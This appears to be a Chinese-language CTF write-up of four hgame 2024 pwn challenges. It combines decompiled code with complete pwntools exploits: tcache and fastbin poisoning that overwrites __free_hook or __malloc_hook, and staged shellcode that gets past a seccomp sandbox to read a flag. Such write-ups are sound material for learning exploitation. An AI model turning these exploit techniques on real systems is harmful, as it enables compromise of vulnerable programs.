hgame2024week2_pwn_wp
pwn
Elden Ring Ⅱ
一个heap manager相关的题目,glibc 2.31,没有pie,包括add edit show delete四个功能,在delete这里有一个uaf
void delete_note()
{
unsigned int v0; // [rsp+Ch] [rbp-4h] BYREF
printf("Index: ");
__isoc99_scanf("%u", &v0);
if ( v0 <= 0xF )
{
if ( notes[v0] )
free((void *)notes[v0]);
else
puts("Page not found.");
}
else
{
puts("There are only 16 pages in this notebook.");
}
}通过uaf 去写 tcache 的 next指针为 puts_got的地址,分配到put_got上,用show去泄露libc_base,然后写free_hook为system,去free一块 内容是/bin/sh的堆
from pwn import *
import itertools
context(os='linux', arch='amd64', log_level='debug')
is_debug = 0
IP = "47.100.137.175"
PORT = 31853
elf = context.binary = ELF('./vuln')
libc = elf.libc
def connect():
return remote(IP, PORT) if not is_debug else process()
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leak_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
def add_note(idx,size):
sla(">","1")
sla("Index: ",str(idx))
sla("Size: ",str(size))
def delete_note(idx):
sla(">","2")
sla("Index: ",str(idx))
def edit_note(idx,content):
sla(">","3")
sla("Index: ",str(idx))
sa("Content: ",content)
def show_note(idx):
sla(">","4")
sla("Index: ",str(idx))
p = connect()
add_note(0,0x70)
add_note(1,0x70)
delete_note(0)
delete_note(1)
puts_got = elf.got['puts']
edit_note(1,p64(puts_got))
add_note(2,0x70)
add_note(3,0x70)
show_note(3)
libc_base = r_leak_libc_64() - libc.sym['puts']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(libc_base))
success(hex(free_hook))
add_note(4,0x70)
add_note(5,0x70)
delete_note(4)
delete_note(5)
edit_note(5,p64(free_hook))
add_note(6,0x70)
add_note(7,0x70)
edit_note(7,p64(system))
edit_note(6,b'/bin/sh')
delete_note(6)
# g(p)
p.interactive()fastnote
咱好笨,想了好久才做出来,学到新思路了
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
unsigned int v3; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+8h] [rbp-8h]
v4 = __readfsqword(0x28u);
init(argc, argv, envp);
while ( 1 )
{
menu();
__isoc99_scanf("%u", &v3);
if ( v3 == 4 )
exit(0);
if ( v3 > 4 )
{
LABEL_12:
puts("Invalid choice");
}
else
{
switch ( v3 )
{
case 3u:
delete();
break;
case 1u:
add();
break;
case 2u:
show();
break;
default:
goto LABEL_12;
}
}
}
}unsigned __int64 delete()
{
unsigned int v1; // [rsp+Ch] [rbp-14h] BYREF
void *ptr; // [rsp+10h] [rbp-10h]
unsigned __int64 v3; // [rsp+18h] [rbp-8h]
v3 = __readfsqword(0x28u);
printf("Index: ");
__isoc99_scanf("%u", &v1);
if ( v1 > 0xF )
{
puts("There are only 16 pages.");
}
else
{
ptr = (void *)notes[v1];
if ( ptr )
{
free(ptr);
ptr = 0LL;
}
else
{
puts("No such note.");
}
}
return __readfsqword(0x28u) ^ v3;
}unsigned __int64 add()
{
unsigned int v0; // ebx
unsigned int v2; // [rsp+0h] [rbp-20h] BYREF
_DWORD size[7]; // [rsp+4h] [rbp-1Ch] BYREF
*(_QWORD *)&size[1] = __readfsqword(0x28u);
printf("Index: ");
__isoc99_scanf("%u", &v2);
if ( v2 > 0xF )
{
puts("There are only 16 pages.");
}
else
{
while ( 1 )
{
printf("Size: ");
__isoc99_scanf("%u", size);
if ( size[0] <= 0x80u )
break;
puts("Too big!");
}
v0 = v2;
notes[v0] = malloc(size[0]);
printf("Content: ");
read(0, (void *)notes[v2], size[0]);
}
return __readfsqword(0x28u) ^ *(_QWORD *)&size[1];
}unsigned __int64 show()
{
unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
printf("Index: ");
__isoc99_scanf("%u", &v1);
if ( v1 > 0xF )
{
puts("There are only 16 pages.");
}
else if ( notes[v1] )
{
puts((const char *)notes[v1]);
}
else
{
puts("No such note.");
}
return __readfsqword(0x28u) ^ v2;
}有 add show delete三个功能,delete那存在一个uaf,这个麻烦的地方往堆块写入数据和创建堆块的功能合在一起了,也就是不能直接通过uaf往free掉的堆块里面写数据,但是可以通过double free fastbin构造一个这样的链 main_arena -> A -> B -> A
通过第一次malloc往 A fd位置写入free_hook的地址,这样这个链就变成 main_arena -> A -> B -> A -> free_hook
第二次malloc把B卸下来,第三次malloc把A卸下来,第四次malloc就会分配到free_hook那了
在free_hook中写system的地址,然后去free一个内容为binsh的堆,相当于执行system(binsh)
然后还有个问题就 通过unsortedbin去泄露libc那,如果unsortedbin和top chunk中间没有东西挡着的话,会合并在一起,因为程序有pie,那只能通过unsortedbin去泄露main_arena的地址算libc的基地址,如果没有pie的话,那改fastbin 或者 tcache的fd next为got表然后show就能泄露了,不过这里edit和add合在一起了,tcache bin有一个key的检查,所以通过tcache bin的思路是不行的
exp
from pwn import *
import itertools
context(os='linux', arch='amd64', log_level='debug')
is_debug = 1
IP = "47.100.137.175"
PORT = 30932
elf = context.binary = ELF('./vuln')
libc = elf.libc
def connect():
return remote(IP, PORT) if not is_debug else process()
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leak_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
def add_note(idx,size,content):
sla("Your choice:","1")
sla("Index: ",str(idx))
sla("Size: ",str(size))
sa("Content: ",content)
def delete_note(idx):
sla("Your choice:","3")
sla("Index: ",str(idx))
def show_note(idx):
sla("Your choice:","2")
sla("Index: ",str(idx))
p = connect()
for i in range(9):
add_note(i,0x80,"AAAAAA")
for i in range(8):
delete_note(i)
show_note(2)
tcache_key = u64(rl()[:-1].ljust(8,b'\x00')) - (0x561c766e7320 - 0x561c766e7000)
success(f"tcache_key ->{hex(tcache_key)}")
show_note(7)
libc_base = r_leak_libc_64() - (0x7ff83873ebe0 - 0x7ff838552000)
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(f"libc_base ->{hex(libc_base)}")
success(f"free_hook ->{hex(free_hook)}")
success(f"system ->{hex(system)}")
# 还原 bin状态
for i in range(8):
add_note(i,0x80,"AAAAAA")
# 分配两个fastbin
for i in range(9):
add_note(i,0x70,"BBBB")
for i in range(9):
delete_note(i)
# main_arena -> 8 -> 7
# main_arena -> 7 -> 8 -> 7 -> free_hook
delete_note(7)
for i in range(7):
add_note(i,0x70,"BBBB")
add_note(7,0x70,p64(free_hook))
add_note(11,0x70,b"/bin/sh")
add_note(7,0x70,"CCCCCCC")
add_note(7,0x70,p64(system))
delete_note(11)
# g(p)
p.interactive()ShellcodeMaster
好巧妙这一题,没有pie 有一个沙箱 把execve 和 execveat给禁用了
int __cdecl main(int argc, const char **argv, const char **envp)
{
void *buf; // [rsp+8h] [rbp-8h]
init();
sandbox(argc, argv);
buf = (void *)(int)mmap((void *)0x2333000, 0x1000uLL, 7, 34, -1, 0LL);
puts("I heard that a super shellcode master can accomplish 2 functions with 0x16 bytes shellcode\n");
read(0, buf, 0x16uLL);
puts("Love!");
mprotect(buf, 0x1000uLL, 4);
JUMPOUT(0x2333000LL);
}有个mprotect() 把写的权限给去掉了,然后在后边有这么一段把mprotect(buf, 0x1000uLL, 4); 残留的寄存器给清空了,还有rbp rsp也改成 2333h,也就是不能通过push pop去修改寄存器,push和pop 指令只占一个字节,0x16字节打orw显然是不够的,思路是用mprotect把mmap出来的段写的权限恢复,然后再read一遍
.text:0000000000401386 49 C7 C7 00 30 33 02 mov r15, 2333000h
.text:000000000040138D 48 C7 C0 33 23 00 00 mov rax, 2333h
.text:0000000000401394 48 C7 C3 33 23 00 00 mov rbx, 2333h
.text:000000000040139B 48 C7 C1 33 23 00 00 mov rcx, 2333h
.text:00000000004013A2 48 C7 C2 33 23 00 00 mov rdx, 2333h
.text:00000000004013A9 48 C7 C4 33 23 00 00 mov rsp, 2333h
.text:00000000004013B0 48 C7 C5 33 23 00 00 mov rbp, 2333h
.text:00000000004013B7 48 C7 C6 33 23 00 00 mov rsi, 2333h
.text:00000000004013BE 48 C7 C7 33 23 00 00 mov rdi, 2333h
.text:00000000004013C5 49 C7 C0 33 23 00 00 mov r8, 2333h
.text:00000000004013CC 49 C7 C1 33 23 00 00 mov r9, 2333h
.text:00000000004013D3 49 C7 C2 33 23 00 00 mov r10, 2333h
.text:00000000004013DA 49 C7 C3 33 23 00 00 mov r11, 2333h
.text:00000000004013E1 49 C7 C4 33 23 00 00 mov r12, 2333h
.text:00000000004013E8 49 C7 C5 33 23 00 00 mov r13, 2333h
.text:00000000004013EF 49 C7 C6 33 23 00 00 mov r14, 2333h
.text:00000000004013F6 41 FF E7 jmp r15
.text:00000000004013F6
.text:00000000004013F6 main endp但是搓了很久,最短的汇编都要23个字节,差一个字节
shellcode = asm('''
mov ax,10
mov edi,r15d
mov dx,7
syscall
xor eax,eax
mov esi,edi
xor edi,edi
xor edx,esi
syscall
''')执行完mprotect后 rcx寄存器 有一个地址是能用的,可以用rcx寄存器作为基地址残留下来的rdx作为read的长度再read一次,然后通过输入修改rdx寄存器 再syscall一次read,但是 0x7的长度 算上填充就不够用了,后面发现 mprotect是有四个标志位的,所以 rdx为0xf也是能mprotect成功的,试了一下五个标志位,发现mprotect失败了,所以rdx最多为 0xf。0xf的话长度就够了,这样就通过两次read 间接的修改寄存器绕过了长度限制,然后写orw就好了
exp
from pwn import *
import itertools
context(os='linux', arch='amd64', log_level='debug')
is_debug = 0
IP = "106.15.72.34"
PORT = 31558
elf = context.binary = ELF('./vuln')
libc = elf.libc
def connect():
return remote(IP, PORT) if not is_debug else process()
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leak_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
p = connect()
# RAX 0x2333
# RBX 0x2333
# RCX 0x2333
# RDX 0x2333
# RDI 0x2333
# RSI 0x2333
# R8 0x2333
# R9 0x2333
# R10 0x2333
# R11 0x2333
# R12 0x2333
# R13 0x2333
# R14 0x2333
# R15 0x2333000 ◂— xor rdi, rdi
# RBP 0x2333
# RSP 0x2333
# *RIP 0x2333000 ◂— xor rdi, rdi
shellcode = asm('''
mov ax,10
shl edi,12
mov dx,0xf
syscall
xor eax,eax
xor edi,edi
mov esi,ecx
syscall
''')
print(len(shellcode))
ru("shellcode")
# g(p)
s(shellcode)
# RAX 0xfffffffffffffff4
# RBX 0x2333
# *RCX 0x233300d ◂— xor eax, eax /* 0x50fff31fe89c031 */
# RDX 0xf
# RDI 0x2333000 ◂— mov ax, 0xa /* 0x660ce7c1000ab866 */
# RSI 0x2333
# R8 0x2333
# R9 0x2333
# R10 0x2333
# *R11 0x306
# R12 0x2333
# R13 0x2333
# R14 0x2333
# R15 0x2333000 ◂— mov ax, 0xa /* 0x660ce7c1000ab866 */
# RBP 0x2333
# RSP 0x2333
# *RIP 0x233300d ◂— xor eax, eax /* 0x50fff31fe89c031 */
# ────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────
# 0x4013f6 <main+276> jmp r15
# ↓
# 0x2333000 mov ax, 0xa
# 0x2333004 shl edi, 0xc
# 0x2333007 mov dx, 0xf
# 0x233300b syscall
# ► 0x233300d xor eax, eax
# 0x233300f mov esi, edi
# 0x2333011 xor edi, edi
# 0x2333013 syscall
# 0x2333015 add byte ptr [rax], al
# 0x2333017 add byte ptr [rax], al
shellcode = asm('nop') * (0x2333015 - 0x233300d)
# print(0xf - len(shellcode))
# 7
# *RAX 0xe
# RBX 0x2333
# RCX 0x2333015 ◂— mov dx, 0x80 /* 0x50f0080ba66 */
# RDX 0xf
# RDI 0x0
# RSI 0x233300d ◂— nop /* 0x9090909090909090 */
# R8 0x2333
# R9 0x2333
# R10 0x2333
# *R11 0x346
# R12 0x2333
# R13 0x2333
# R14 0x2333
# R15 0x2333000 ◂— mov ax, 0xa /* 0x660ce7c1000ab866 */
# RBP 0x2333
# RSP 0x2333
# RIP 0x2333015 ◂— mov dx, 0x80 /* 0x50f0080ba66 */
shellcode += asm('''
mov dl,0xff
mov al,0
syscall
''')
# g(p)
s(shellcode)
# RAX 0x0
# RBX 0x2333
# RCX 0x2333015 ◂— mov dl, 0xff /* 0x50f00b0ffb2 */
# RDX 0xff
# RDI 0x0
# RSI 0x233300d ◂— nop /* 0x9090909090909090 */
# R8 0x2333
# R9 0x2333
# R10 0x2333
# R11 0x346
# R12 0x2333
# R13 0x2333
# R14 0x2333
# R15 0x2333000 ◂— mov ax, 0xa /* 0x660ce7c1000ab866 */
# RBP 0x2333
# RSP 0x2333
# *RIP 0x2333019 ◂— 0x50f
# ────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────
# 0x2333015 mov dl, 0xff
# 0x2333017 mov al, 0
# ► 0x2333019 syscall <SYS_read>
# fd: 0x0 (pipe:[434190])
# buf: 0x233300d ◂— nop /* 0x9090909090909090 */
# nbytes: 0xff
# 0x233301b add byte ptr [rax], al
# 0x233301d add byte ptr [rax], al
# 0x233301f add byte ptr [rax], al
# 0x2333021 add byte ptr [rax], al
# 0x2333023 add byte ptr [rax], al
# 0x2333025 add byte ptr [rax], al
# 0x2333027 add byte ptr [rax], al
# 0x2333029 add byte ptr [rax], al
shellcode = asm('nop') * 0x10
# 读入flag字符串
shellcode += asm('''
xor rax,rax
mov rdi,0
mov rsi,r15
syscall
mov rax,2
mov rdi,r15
mov rsi,0
syscall
xor rax,rax
mov rdi,3
mov rsi,r15
mov rdx,0x40
syscall
mov rax,1
mov rdi,1
mov rsi,r15
mov rdx,0x40
syscall
''')
s(shellcode)
# g(p)
s(b"/flag\x00")
p.interactive()old_fastnote
和fastnote的代码逻辑一样,但是glibc变成了2.23,没有tcache,fastbin attack的时候会对size位做一个检查,如果不符合fastbin的大小就会报错,在__malloc_hook - 0x23的位置有一个合适的”size”位,通过fastbin attack 在 malloc_hook - 0x23位置分配一个chunk,然后把mallc_hook改成one_gadget就打通了
from pwn import *
import itertools
context(os='linux', arch='amd64', log_level='debug')
is_debug = 0
IP = "106.14.57.14"
PORT = 30407
elf = context.binary = ELF('./vuln')
libc = elf.libc
def connect():
return remote(IP, PORT) if not is_debug else process()
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leak_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
def add_note(idx,size,content):
sla("Your choice:","1")
sla("Index: ",str(idx))
sla("Size: ",str(size))
sa("Content: ",content)
def delete_note(idx):
sla("Your choice:","3")
sla("Index: ",str(idx))
def show_note(idx):
sla("Your choice:","2")
sla("Index: ",str(idx))
p = connect()
add_note(0,0x80,"AAAAA")
add_note(1,0x80,"AAAAA")
delete_note(0)
show_note(0)
leak_addr = u64(rl()[:-1].ljust(8,b'\x00'))
main_arena = leak_addr - (0x7f51dafc4b78 - 0x7f51dafc4b20)
libc_base = leak_addr - (0x7f13e2bc4b78 - 0x7f13e2800000)
global_max_fast = leak_addr + (0x7fe87fdc67f8 - 0x7fe87fdc4b78)
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
system = libc_base + libc.sym['system']
success(f"libc_base ->{hex(libc_base)}")
success(f"main_arena ->{hex(main_arena)}")
success(f"global_max_fast ->{hex(global_max_fast)}")
success(f"free_hook ->{hex(free_hook)}")
success(f"malloc_hook ->{hex(malloc_hook)}")
add_note(0,0x80,"AAAAA")
add_note(2,0x60,"BBBB")
add_note(3,0x60,"BBBB")
delete_note(2)
delete_note(3)
delete_note(2)
target = main_arena + (0x7f74237c4b4d - 0x7f74237c4b20)
success(hex(target))
one_gadget = libc_base + 0xf1247
add_note(2,0x60,p64(malloc_hook - 0x23))
add_note(3,0x60,b"BBBB")
add_note(2,0x60,"BBBB")
# g(p)
add_note(2,0x60,b'a' * 0x13 + p64(one_gadget))
p.sendlineafter(b'choice:',b'1')
p.sendlineafter(b'Index: ',str(2))
p.sendlineafter("Size: ",str(0x60))
p.interactive()